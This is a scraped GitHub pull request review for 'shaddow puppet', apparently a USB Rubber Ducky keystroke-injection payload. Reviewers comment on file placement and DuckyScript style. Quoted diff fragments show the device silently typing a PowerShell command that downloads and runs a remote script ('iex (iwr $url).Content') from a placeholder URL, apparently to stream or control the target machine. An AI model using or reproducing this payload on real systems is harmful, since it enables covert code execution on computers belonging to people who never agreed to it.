-
Notifications
You must be signed in to change notification settings - Fork 1.5k
shaddow puppet #537
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
base: master
Are you sure you want to change the base?
shaddow puppet #537
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This is in the incorrect your payload.txt
file should be placed within payloads/library/CATEGORY/PAYLOAD/playload.txt
If your category is remote access, then your payload should be placed in
payloads/library/incident_response/Shadowpuppet/payload.txt
STRING LISTEN_PORT | ||
STRING ";$url='" | ||
STRING REMOTE_PS_URL | ||
STRING "';iex (iwr $url).Content" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You can compress this STRING
ENTER
into one line by using STRINGLN
STRINGLN "';iex (iwr $url).Content"
|
||
REM ─── CONFIG ─────────────────────────────────────── | ||
DEFINE EXECUTE_PAYLOAD TRUE | ||
DEFINE REMOTE_PS_URL https://yourdomain.com/streamer/stream.ps1 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Please include a readme.md
explaining your payload and its configurations so the end user has a better understanding of what the payload is doing and what needs to be they need change.
This seems to be a duplicate PR? Please close your other PR |
|
||
ATTACKMODE HID | ||
LED_OFF | ||
DELAY 500 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
If your target machine is windows, consider using EXTENSION PASSIVE_WINDOWS_DETECT
this allows the Ducky to dynamically determine when the target machine is accepting keystrokes removing the need for a long start delay.
No description provided.